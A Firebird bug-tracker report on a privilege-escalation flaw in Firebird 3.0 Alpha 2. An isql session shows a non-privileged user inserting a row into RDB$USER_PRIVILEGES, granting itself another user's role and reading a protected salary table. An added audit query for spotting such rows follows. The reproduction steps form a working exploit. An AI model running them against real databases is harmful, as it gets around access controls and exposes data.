non-privileged user can grant other's role to himself
-----------------------------------------------------

                 Key: CORE-4341
                 URL: http://tracker.firebirdsql.org/browse/CORE-4341
             Project: Firebird Core
          Issue Type: Bug
          Components: Security
    Affects Versions: 3.0 Alpha 2
            Reporter: Pavel Zotov

SQL> create database 'sec.fdb';
SQL> drop user boss; -- if exists...
SQL> drop user zero; -- if exists...
SQL> create user boss password 'boss'; -- this user CAN access some data
SQL> create user zero password 'zero'; -- this is a non-privileged user
SQL> create role rboss;
SQL> create role rzero;
SQL> grant rboss to boss;
SQL> grant rzero to zero;
SQL> create table salary(id int, s int);
SQL> insert into salary values(1, 1000);
SQL> commit;
SQL> grant all on salary to rboss; -- we grant access only to this role; NOT to role 'RZERO' !
SQL> commit;
SQL> quit;
----------------
-- now check that user BOSS can view and edit table SALARY via role RBOSS:
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user boss -pas boss -role RBOSS
Database: /var/db/fb30/sec.fdb, User: boss, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER                            BOSS
ROLE                            RBOSS

SQL> select * from salary;

ID                              1
S                               1000

SQL> update salary set s=2000 where id=1;
SQL> insert into salary values(2,2222);
SQL> commit;
SQL> select * from salary;

ID                              1
S                               2000

ID                              2
S                               2222

-- that's OK.
SQL> exit;
-------------------------------------
-- now connect as non-privileged user 'ZERO' (specifying his role is optional; the result is the same):
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user zero -pas zero
Database: /var/db/fb30/sec.fdb, User: zero
SQL> show role;
RBOSS
RZERO
SQL> show table;
SALARY
SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY
-- OK, that is how it should be
-- and now we insert a new record into system table RDB$USER_PRIVILEGES (we CAN do this!)
-- NB: we can add the row either NOT specifying a value for the RDB$GRANTOR field or setting it = 'ZERO' (i.e. the current user):
SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED! Why ??
SQL> commit;
SQL> connect '/var/db/fb30/sec.fdb' user zero password 'zero' role 'RBOSS';
Database: '/var/db/fb30/sec.fdb', User: zero, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER                            ZERO   -- I'm connected as a non-privileged user...
ROLE                            RBOSS  -- ...but I HAVE been granted the role of the BOSS (and I did it myself)

-- final check:
SQL> select * from salary;

ID                              1
S                               2000

ID                              2
S                               2222

SQL> show version;
ISQL Version: LI-T3.0.0.30876 Firebird 3.0 Alpha 2
Server version:
Firebird/Linux/AMD/Intel/x64 (access method), version "LI-T3.0.0.30876 Firebird 3.0 Alpha 2"
on disk structure version 12.0

--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
   http://tracker.firebirdsql.org/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

------------------------------------------------------------------------------
Firebird-Devel mailing list, web interface at https://lists.sourceforge.net/lists/listinfo/firebird-devel
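An audit query a DBA can run after reading the report above, added here as an example and not part of the bug report or of the Firebird project. It lists role memberships in RDB$USER_PRIVILEGES whose grantor is missing, is the grantee itself, or is neither SYSDBA nor the role's owner. It assumes the standard Firebird system tables RDB$USER_PRIVILEGES and RDB$ROLES (with its RDB$OWNER_NAME column) and the codes used in the report: RDB$PRIVILEGE = 'M' for membership, RDB$USER_TYPE = 8 for a user, RDB$OBJECT_TYPE = 13 for a role. The row ZERO inserted (no grantor, or grantor 'ZERO') is flagged; the legitimate `grant rboss to boss` issued by the role's owner is not.

```sql
-- Added audit query (example, not from the report). Run as SYSDBA or the
-- database owner, e.g. in isql with "set list on;".
-- Assumptions: RDB$USER_PRIVILEGES and RDB$ROLES exist as in Firebird;
-- RDB$ROLES.RDB$OWNER_NAME holds the role creator; codes as in the report
-- ('M' = membership, user type 8 = user, object type 13 = role).
select
    p.rdb$user          as grantee,
    p.rdb$relation_name as role_name,
    p.rdb$grantor       as grantor,
    r.rdb$owner_name    as role_owner,
    case
        when p.rdb$grantor is null          then 'NO GRANTOR'
        when p.rdb$grantor = p.rdb$user     then 'SELF-GRANTED'
        else                                     'GRANTOR IS NOT ROLE OWNER'
    end                 as finding
from rdb$user_privileges p
left join rdb$roles r
       on r.rdb$role_name = p.rdb$relation_name
where p.rdb$privilege   = 'M'     -- role membership rows only
  and p.rdb$object_type = 13      -- granted object is a role
  and (   p.rdb$grantor is null
       or (    p.rdb$grantor <> 'SYSDBA'
           and p.rdb$grantor <> coalesce(r.rdb$owner_name, '') ) )
order by p.rdb$relation_name, p.rdb$user;
```

Two caveats. Memberships legitimately granted by a user who holds the role WITH ADMIN OPTION are also listed, so each hit needs a look at who the grantor is. And the report only shows the grantor being omitted or set to the current user; if a direct insert could also carry an arbitrary RDB$GRANTOR value, a forged row would be indistinguishable from a real one, which is why the server-side check on writes to RDB$USER_PRIVILEGES, not this query, is the actual fix.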